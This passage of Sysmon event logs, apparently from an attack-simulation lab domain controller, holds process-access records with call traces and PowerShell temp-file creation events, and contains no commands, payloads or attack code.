C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:19.534","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5591,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:19.534\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:19.534","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5592,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:19.534\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:19.534","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5593,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:19.534\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:19.534","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5594,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:19.534\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:19.534","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5595,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:19.534\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:19.534","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5596,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:19.534\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:19.534","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5597,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:19.534\r\nSourceProcessGUID: {41C8662E-20D7-5F25-0000-00105BE20800}\r\nSourceProcessId: 1592\r\nSourceThreadId: 4204\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-20D1-5F25-0000-00108C3E0800}\r\nTargetProcessId: 668\r\nTargetImage: C:\\Windows\\system32\\chcp.com\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:19.534","SourceProcessGUID":"{41C8662E-20D7-5F25-0000-00105BE20800}","SourceProcessId":"1592","SourceThreadId":"4204","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-20D1-5F25-0000-00108C3E0800}","TargetProcessId":"668","TargetImage":"C:\\Windows\\system32\\chcp.com","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5598,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:59:19.971\r\nProcessGuid: {41C8662E-20D7-5F25-0000-001081F10800}\r\nProcessId: 3496\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\lgro13a1.dll\r\nCreationUtcTime: 2020-08-01 07:59:19.971","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:59:19.971","ProcessGuid":"{41C8662E-20D7-5F25-0000-001081F10800}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\lgro13a1.dll","CreationUtcTime":"2020-08-01 07:59:19.971","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5599,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:19.971\r\nProcessGuid: {41C8662E-20D7-5F25-0000-001081F10800}\r\nProcessId: 3496\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\lgro13a1.cmdline\r\nCreationUtcTime: 2020-08-01 07:59:19.971","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 